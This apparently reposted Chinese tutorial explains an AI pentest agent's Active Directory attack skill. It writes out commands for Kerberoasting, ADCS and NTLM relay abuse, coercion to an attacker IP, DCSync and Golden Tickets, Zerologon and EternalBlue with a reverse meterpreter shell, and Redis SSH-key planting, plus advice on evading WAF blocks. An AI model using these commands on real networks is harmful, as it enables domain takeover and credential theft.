拓冰建站拓冰建站
首页 / 资讯中心 / 正文

CyberStrikeAI 内网域攻击技能实战指南:从 BloodHound 路径分析到 ADCS/NTLM Relay 与一击致命域漏洞

CyberStrikeAI 内网域攻击技能实战指南从 BloodHound 路径分析到 ADCS/NTLM Relay 与一击致命域漏洞【免费下载链接】CyberStrikeAIThe system of action for AI-native cybersecurity—where intent becomes governed execution, evidence becomes operational memory, and every operation improves the next.项目地址: https://gitcode.com/GitHub_Trending/cy/CyberStrikeAI本篇技术指南以 CyberStrikeAI 仓库中 active-directory-attack 技能文档 为核心骨架完整拆解其在真实内网渗透测试中对 Active DirectoryAD、ADCS、NTLM Relay 与内部域环境的攻击方法学侦察阶段如何用 BloodHound 构建攻击路径Kerberos 侧如何实施 AS-REP Roasting 与 Kerberoasting如何围绕 ADCS ESC1/ESC8、NTLM Relay、强制认证 Coerce、DACL 滥用与 DCSync 构建完整提权链路以及 Zerologon、NoPac、PrintNightmare、EternalBlue 等一击致命域级漏洞的命中条件。读完本文你将掌握一套从枚举侦察到域管接管的完整攻击链打法并能理解该技能在 CyberStrikeAI 多代理编排中如何通过项目黑板记录事实、输出规范化漏洞报告并接受验证铁律约束。技能定位何时触发本技能在 CyberStrikeAI 的技能体系中每个技能都是一个独立子目录目录根上必须有SKILL.md含 YAML front mattername、description后接 Markdown 正文且目录名须与name一致具体规范见 skills/README.md。本技能active-directory-attack的 front matter 声明如下name: active-directory-attack description: - 内网域攻击:BloodHound,Kerberoast,ADCS ESC1/ESC8,NTLM Relay,Coerce,DACL,DCSync, Zerologon/NoPac/PrintNightmare,mitm6,LLMNR,Linux内网。 Use when attacking Active Directory, ADCS, NTLM relay, or internal domain. metadata: tags: [渗透测试, penetration-testing, 红队]从声明可以看出当攻击面进入 Active Directory、ADCS、NTLM Relay 或内部域环境时模型应当拉取本技能全文执行。从仓库的运行时设计看多代理DeepAgent会话中由 ADK 的skill中间件渐进披露各技能系统提示中只列出 name/description模型再调用skill工具拉取SKILL.md全文可选的multi_agent.eino_skills.filesystem_tools允许技能包内脚本通过read_file/execute访问见 skills/README.md。该技能覆盖的完整技术栈可归纳为十一个攻击方向侦察BloodHoundSharpHound 收集 → 攻击路径KerberosGetNPUsersAS-REP/ GetUserSPNsKerberoastADCSCertipy 一把梭ESC1 / ESC8NTLM Relay比 Pass-the-Hash 更重要PtH 常被 EDR 拦截强制认证 CoercePetitPotam / coercer / printerbugDACL 滥用WriteDACL → DCSync影子凭据DCSync → krbtgt hash → Golden Ticket一击致命域 CVEZerologon / NoPac / PrintNightmare / EternalBlueIPv6 / mitm6DHCPv6 DNS WPADLLMNR/NBT-NS 投毒Responder hashcatLinux 内网横向Redis 未授权 / NFS / Docker下面逐一展开。侦察先行BloodHound 与攻击路径可视化技能开篇即强调内网域是2023 真实主战场侦察阶段的第一要务是运行 BloodHound由 SharpHoundWindows 端收集器在目标域内收集节点与边关系导入 BloodHound 后即可得到从当前控制点通往域管的最短攻击路径。在 CyberStrikeAI 的工具注册表中BloodHound 以bloodhound-python命令注册Linux 侧对应工具见 tools/bloodhound.yaml其声明的能力包括域信息收集攻击路径分析权限关系可视化最短攻击路径计算高风险路径识别该工具配置暴露的关键参数与技能中的命令一一对应参数类型对应 flag说明domainstring-d目标域名usernamestring-u域用户名passwordstring-p域用户密码collection_methodstring-c收集模式All、ACL、DCOM、LocalAdmin、RDP等默认Alldcstring-dc域控制器 IP 地址additional_argsstring追加额外的 bloodhound 选项注意工具描述中给出的使用前提需要域用户凭据、需要 Neo4j 数据库支持、收集过程可能耗时较长且必须用于授权环境。collection_method建议使用All全量收集 ACL 与对象属性因为后续 DACL 滥用路径见下文高度依赖完整的 ACL 数据。按照 skills/attack-surface-recon/SKILL.md 的节奏侦察是开局第一动作识别到新端口、新凭据后应立即upsert_project_fact写入黑板而不是裸奔进利用。Kerberos 预认证攻击AS-REP Roasting 与 Kerberoasting技能给出的两条 Kerberos 攻击命令均出自 Impacket 工具集GetNPUsers.py domain/ -usersfile users.txt -no-pass # AS-REP Roasting GetUserSPNs.py domain/user:password -request # KerberoastingAS-REP RoastingGetNPUsers针对未启用 Kerberos 预认证DONT_REQ_PREAUTH的账户域控不会验证其预认证时间戳攻击者可直接请求其 TGT得到的响应中包含可用离线破解的加密材料。技能中直接给出GetNPUsers配合-no-pass枚举无需密码即可拉取可爆破票据的账户。KerberoastingGetUserSPNs针对注册了 SPN 的普通域账户任何域用户都可以向域控申请这些服务账户的 TGT票据以服务账户密码派生的密钥加密离线破解即可还原服务账户明文密码——许多企业将服务账户密码设为高强度却长期不轮换导致一个 SPN 账户密码一个横向移动跳板。破解环节hashcat两种票据均需离线破解CyberStrikeAI 注册了 tools/hashcat.yaml 作为密码恢复工具其参数设计如下参数类型默认值说明hash_filepositional-包含哈希的文件必填hash_typeflag-m-哈希类型编号必填attack_modeflag-a00字典、1组合、3掩码等wordlistpositional/usr/share/wordlists/rockyou.txt字典文件maskpositional-掩码掩码攻击用additional_argspositional-额外参数支持规则引擎如-r实践中最常用hashcat -m 18200Kerberoast 票据与hashcat -m 13100AS-REP 票据配合-a 0字典模式而抓到的 NetNTLMv2见 LLMNR 一节对应-m 5600。hashcat 支持 GPU 加速、字典/组合/掩码多种攻击模式及规则引擎是技能中抓到 hash 就破解的标准配套。ADCS 攻击Certipy 与 ESC1/ESC8技能以Certipy 一把梭概括 ADCS 攻击的核心流程certipy find domain/user:password -vulnerable -dc-ip DC_IP # 枚举易受攻击的模板 certipy req domain/user:password -template ESC1模板 -upn 目标域管 # ESC1certipy find -vulnerable自动枚举证书颁发机构CA上的证书模板标记存在 ESCEscalation系列缺陷的模板省去手工比对模板权限与 EKU 的过程。ESC1若某模板允许请求者指定 SANsubjectAltName即可在证书申请中直接声明-upn administratordomain签出域管理员的证书随后用该证书申请 TGT 完成提权。ESC8将 NTLM Relay 到的 HTTP 端点指向 CA 的 Web 注册接口-t http CA --adcs以目标机器账户身份签发 DC 证书实现从中继 NTLM 认证到域管权限的转化详见下一节。ADCS 证书攻击的最终落地形态与 DCSync 相同拿到域管或 DC 机器账户的证书后使用certipy auth -pfx获得对应 TGT随后即可执行 DCSync 提取 krbtgt hash。NTLM Relay比 Pass-the-Hash 更优先的横向路径技能明确给出优先级判断NTLM Relay 比 Pass-the-HashPtH重要因为 PtH 常被 EDR 拦截。现代 EDR 普遍监控lsass.exe内存访问与 NTLM hash 注入行为直接sekurlsa::pth极易触发告警而 Relay 是在网络层转发认证不触碰本机内存。ntlmrelayx.py -t ldap://DC_IP --escalate-user 新用户 # LDAP 中继提权 ntlmrelayx.py -t http://CA --adcs # ESC8中继到 CA 签证书 ntlmrelayx.py -t smb://TARGET --delegate-access # RBCD资源约束委派三条典型目标中继目标载荷效果LDAPldap://--escalate-user将中继到的域用户添加到高权限组或写入 DCSync 权限HTTP CAhttp://--adcs触发 ESC8以受害者机器身份签发证书SMB 目标--delegate-access触发 RBCD基于资源的约束委派获得目标机器的服务票据前提条件值得注意中继到 LDAP 需要目标 DC 未强制启用 LDAP 签名/通道绑定SMB 中继需要目标未开启 SMB 签名这正是红队实战中先nmap -sV -sC见 tools/nmap.yaml 默认的-sT -sV -sC组合确认签名状态的原因。工具层面仓库注册的 tools/netexec.yaml原 CrackMapExec通过-H参数原生支持 Pass-the-Hash 场景同时以-M提供模块化横向扩展SMB、SSH、WinRM 等多协议。Relay 的前提是让受害者主动向我们发起认证这就引出下一节——强制认证。强制认证 Coerce把认证喂给 RelayNTLM Relay 链路的输入端需要受害者机器主动发起 NTLM 认证强制认证Coerce攻击正是为此设计# PetitPotam基于 MS-EFSRPC 的 EfsRpcOpenFileRaw 调用 python3 petitpotam.py attacker_ip victim_ip # coercer全协议喷射自动遍历多个 Coerce 原语 coercer coerce -u user -p password -d domain -l attacker_ip -t victim_ip # printerbug基于 MS-RPRN 的 SpoolService python3 printerbug.py domain/user:passwordtarget attacker_ipPetitPotamMS-EFSRPC调用目标机器的加密文件系统远程协议EFSRPC接口迫使机器账户向攻击者发起 NTLM 认证对未打补丁的 DC 甚至可用匿名会话触发。coercer将 PetitPotam、printerbug 等数十种 Coerce 原语打包全协议喷射目标提高命中率。printerbugMS-RPRN利用打印后台处理服务Spooler的RpcRemoteFindFirstPrinterChangeNotification接口触发认证。经典攻击链组合为coercer/PetitPotam 强制 DC 认证 → ntlmrelayx 中继到 LDAP--escalate-user或 CA--adcsESC8→ 获得高权限。这条链在技能中被标记为与现代内网默认双栈环境高度契合的隐蔽首选路径因为 DC 机器账户的认证难以通过关闭 LLMNR 等方式防御。DACL 滥用WriteDACL 与影子凭据当侦察数据尤其 BloodHound 的 ACL 收集显示当前账户对某对象拥有特殊 DACL 权限时可以实施两类高价值滥用# WriteDACL给自己添加 DCSync 权限Replicating Directory Changes 等 net rpc grant user DCSync -U domain/user -I DC_IP # 影子凭据certipy shadow仅需 GenericWrite不修改密码、不留痕 certipy shadow auto -u userdomain -p password -account victimWriteDACL → DCSync若当前账户对域对象拥有 WriteDACL 权限可修改域对象的 DACL将复制目录更改DS-Replication-Get-Changes / All权限授予自己随后执行 DCSync 提取全部域凭据。影子凭据certipy shadow仅需对目标对象拥有 GenericWrite 权限即可向目标的msDS-KeyCredentialLink属性写入攻击者控制的密钥对之后以该密钥申请 TGT。技能特别强调其不改密码、不留痕——受害者密码不变常规密码审计无法发现属于典型的持久化/提权后门。在 CyberStrikeAI 的输出规范中这两类操作被明确列入必须实时记账的权限改动台账类型DCSync/RBCD/影子凭据见 skills/pentest-output-standards/SKILL.md每条写入型改动需记录主机、类型、位置、内容与回滚命令。DCSync 与黄金票据secretsdump.py domain/user:passwordDC_IP -just-dcsecretsdump -just-dc通过域复制协议直接从 DC 提取krbtgt等账户的 hash。得到 krbtgt hash 后即可伪造黄金票据Golden Ticket用ticketer.py以 krbtgt hash 签发任意用户的 TGT实现全域任意身份访问与持久化。技能将 DCSync 定位为多类攻击的汇合点ESC1/ESC8 证书提权、Zerologon 置空密码、WriteDACL 提权最终都通向 DCSync——拿到 krbtgt hash 即拿到整个域。防御侧对应的是定期轮换 krbtgt 密码、审计复制目录更改权限授予、监控4624/4662等异常复制事件。一击致命的域级 CVE先测再打命中即域管技能专门列出四个一击致命的域级漏洞并给出明确策略——先探测命中直接域管避免低效的逐跳提权CVE名称攻击本质命中条件/效果CVE-2020-1472Zerologon置空 DC 机器账户密码利用 Netlogon 加密缺陷将 DC 机器账户密码置空随后以空密码 DCSync需目标未安装 2020 年 8 月补丁且未启用强制安全通道CVE-2021-42278/42287NoPac机器账户改名申 DC TGT通过 SamAccountName 混淆机器账户改名后与 DC 同名再申请 TGT以 DC 身份获得服务票据需目标未打 2021 年 11 月补丁CVE-2021-34527PrintNightmare后台打印服务 RCE利用 Spooler 服务加载恶意驱动/远程 DLL 执行获得 SYSTEM需目标开启 Print SpoolerMS17-010EternalBlue老 SMBv1 直接 RCE针对未打补丁的 SMBv1 漏洞直接远程代码执行多用于内网遗留老系统在 CyberStrikeAI 中Metasploit 被注册为可编程调用框架见 tools/metasploit.yaml模型以模块名 JSON 选项的方式通过msfconsole -q -x非交互执行。例如 EternalBlue 的标准调用{ module: exploit/windows/smb/ms17_010_eternalblue, options: { RHOSTS: 192.168.1.10, LHOST: 192.168.1.100, PAYLOAD: windows/x64/meterpreter/reverse_tcp } }该工具封装会自动构建use module、逐项set、run、exit的命令序列。值得注意的是Zerologon 等漏洞的成功利用会永久性修改 DC 机器账户密码若未使用-restore恢复属于输出规范中必须记账的高危改动利用后应立即恢复原密码并记录台账。IPv6/mitm6现代内网的首选隐蔽路径技能明确标注IPv6/mitm6 是默认双栈内网必打的攻击面比 LLMNR 更隐蔽是现代内网首选。绝大多数企业内网同时启用 IPv6 协议栈但缺少 IPv6 专属的 DHCP/DNS 基础设施这为 mitm6 提供了天然的劫持空间mitm6 -d domain -i eth0 # 劫持 DHCPv6 DNS ntlmrelayx.py -6 -t ldap://DC_IP --delegate-access # 中继到 LDAP 做 RBCD ntlmrelayx.py -6 -t http://CA --adcs # 或中继到 CA 触发 ESC8攻击链为mitm6 响应内网主机的 DHCPv6 请求将自己设为 DNS 服务器 → 受害主机查询 WPADWeb Proxy Auto-Discovery时解析到攻击机 → 受害主机访问恶意 WPAD 代理并以 NTLM 认证 → ntlmrelayx 将认证中继到 LDAP 或 ADCS。相比 LLMNR 投毒需要受害主机先发生名称解析失败mitm6 的触发是无条件的只要主机配置了 IPv6 且内网无合法 DHCPv6 服务因此命中率更高且更难防御。技能建议在双栈内网优先尝试 mitm6 链路LLMNR 投毒作为次选。这与工具侧 tools/responder.yaml 对 Responder 的封装形成互补Responder 专注于 IPv4 的 LLMNR/NBT-NS/MDNS 投毒。LLMNR/NBT-NS 投毒Responder 抓 NetNTLMv2responder -I eth0 -wv # 交互运行WPAD 投毒 responder -I eth0 -A # 仅分析模式不实际投毒 hashcat -m 5600 hash.txt rockyou.txt # 破解抓到的 NetNTLMv2当内网主机解析不存在的名称时会依次回退到 LLMNR、NBT-NS 广播查询攻击者监听并伪造响应即可骗取 NetNTLMv2 凭据。抓到后要么离线破解hashcat -m 5600要么直接喂给 ntlmrelayx 做中继。仓库对 Responder 的封装tools/responder.yaml为模型调用设计了完整的参数映射参数类型默认值对应 flag说明interfacestringeth0-I网络接口analyzeboolfalse-A仅分析模式不投毒wpadbooltrue-w启用 WPAD 恶意代理fingerprintboolfalse-f指纹识别模式durationint300-运行持续时间秒0 表示手动停止additional_argsstring空追加直接追加到命令末尾值得注意的是封装内置了duration自动停止机制——默认运行 300 秒后自动terminate进程避免长时间占用网络对生产环境造成持续干扰这体现了该平台工具封装对授权测试边界的内建约束。Linux 内网横向域外同样重要技能在域攻击主线之外还专门列出了 Linux 内网侧的三个高频突破口# Redis 未授权CONFIG SET 写 SSH 公钥 redis-cli -h target -p 6379 config set dir /root/.ssh config set dbfilename authorized_keys set x \n\nssh_public_key\n\n save # NFS 枚举showmount 查看共享 showmount -e target # Docker 未授权2375 端口直接控制 docker -H tcp://target:2375 psRedis 未授权目标以默认配置监听 6379 且无认证时可通过CONFIG SET dir/dbfilename将数据库文件写入受害主机的authorized_keys随后用 SSH 公钥登录。防御侧要求 Redis 绑定回环或启用requirepass。NFS showmountshowmount -e枚举 NFS 共享目录若配置了no_root_squash可挂载后以 root 身份写入如向authorized_keys或 crontab 写入后门。Docker 2375Docker daemon 若监听tcp://0.0.0.0:2375且无 TLS 认证攻击者可直接拉取镜像并挂载宿主根目录启动特权容器实现宿主机接管。这三条路径与域攻击主线互补——内网渗透往往先拿一台 Linux 跳板再从跳板打进域因此技能将 Linux 内网攻击与域攻击并列放在同一技能中。在 CyberStrikeAI 中的实战落地黑板、验证与输出纪律该技能不是孤立的命令清单而是 CyberStrikeAI 渗透测试方法论的一个环节。技能文档的正文块本质上是一份攻击面提示词执行时必须遵守平台侧的三个配套纪律1. 边打边记录项目黑板按照 skills/pentest-blackboard/SKILL.md所有确认的认知必须立即写入绑定项目的 SQLite 黑板环境/目标/认证等认知 →upsert_project_facttarget/auth/infra/business/前缀fact_key采用小写category/slug格式如auth/cred-kerberoast-hash发现与利用上下文 →finding/chain/exploit/poc/前缀且必须带links关系边discovered_on、leads_to、enables、exploits等类型构建结构化攻击图验证成功的可交付漏洞 →record_vulnerability标题、严重程度、类型、目标、POC、影响、修复建议记录前可用list_vulnerabilities查重。以本技能场景为例BloodHound 发现 WriteDACL 路径后应立即写finding/writedacl-target利用成功后写chain/dacl-to-dcsync并关联exploit/与poc/事实最终以record_vulnerability产出正式漏洞条目。2. 验证铁律与负结果skills/pentest-verification/SKILL.md 与黑板技能均强调搜索≠漏洞无证据不得写confirmed。对应到本技能识别到 ADCS 模板、域版本或中间件后应先执行component-vuln-intel的联网情报搜索再判断无已知漏洞收到 403/429/RST/WAF 拦截后禁止同条件重试应换路代理、UA、XFF、协议、端口Zerologon、NoPac 等漏洞必须实测确认如zerologon脚本实际置空验证后才能confirmed失败的利用尝试如 SMB 签名开启导致 relay 失败也要写负结果 Fact避免后续重复打点。3. 输出规范与改动台账skills/pentest-output-standards/SKILL.md 要求每轮输出包含思维链、漏洞报告模板与改动台账。台账类型中与本技能直接相关的是权限改动类DCSync/RBCD/影子凭据以及申请凭据类证书申请。例如执行certipy shadow写入msDS-KeyCredentialLink或 Zerologon 置空密码后必须实时记录#|时间|主机|类型|位置|内容|回滚命令每条改动需给出回滚命令交付时输出完整台账与一键回滚脚本逆序生成系统绝不擅自清理——这与技能中影子凭据不留痕的利用特性形成显式的可审计约束。多代理编排中的技能分工在 CyberStrikeAI 的多代理编排见 agents/orchestrator.md 与 docs/zh-CN/MULTI_AGENT_EINO.md中本技能通常由以下角色配合执行侦察代理先期执行 attack-surface-recon 完成资产测绘与指纹识别攻击代理拉取本技能active-directory-attack执行域内攻击动作协调者orchestrator汇总子代理的待落库条目统一写入黑板避免子代理无工具时证据丢失见黑板技能中协调者分工。技能间的衔接点是黑板 Factattack-surface-recon产出的域控制器 IP、开放端口、SMB 签名状态等是本技能选择Relay 还是 PtH先测 Zerologon 还是先 Kerberoast的决策输入本技能产出的凭据、hash、证书又横向喂给后续的横向移动与持久化环节。授权与安全边界本技能文档及本文所述的全部技术均以授权环境下的渗透测试与红队演练为前提。BloodHound 工具描述中明确建议在授权环境中使用Responder 封装默认 300 秒自动停止impacket 与 Metasploit 的注册同样强调仅用于授权的安全测试。Zerologon、NoPac 等利用会实际修改域内对象属性PrintNightmare 与 EternalBlue 会在目标系统执行代码任何未授权使用均违反法律与安全红线。在实际项目中请务必先确认测试范围、时间窗口与回滚预案再执行本技能中的任何一步。小结一条完整的内网域攻击链将技能全文串成一条可执行的主线侦察SharpHound/bloodhound-python 收集数据 → BloodHound 计算最短攻击路径凭据猎取GetNPUsersAS-REP/ GetUserSPNsKerberoast离线破解或 Responder/mitm6 抓取 NetNTLMv2提权利用优先尝试 Zerologon/NoPac/PrintNightmare 等一击致命 CVE命中即域管否则走 certipy ESC1/ESC8、NTLM Relay Coerce、WriteDACL/影子凭据最终接管DCSync 提取 krbtgt hash → Golden Ticket 持久化记录与交付全部认知入黑板Fact/链/漏洞权限改动入台账交付漏洞报告与回滚脚本。每一步在 CyberStrikeAI 中都有对应的工具注册tools/ 下的 YAML 配置与技能衔接这正是该平台将意图变为受治理执行、证据变为可操作记忆的工程化体现。【免费下载链接】CyberStrikeAIThe system of action for AI-native cybersecurity—where intent becomes governed execution, evidence becomes operational memory, and every operation improves the next.项目地址: https://gitcode.com/GitHub_Trending/cy/CyberStrikeAI创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
分享:

看完干货,该让你的企业上线了

免费需求沟通 · 48 小时内出具建站方案 · 河南本地可上门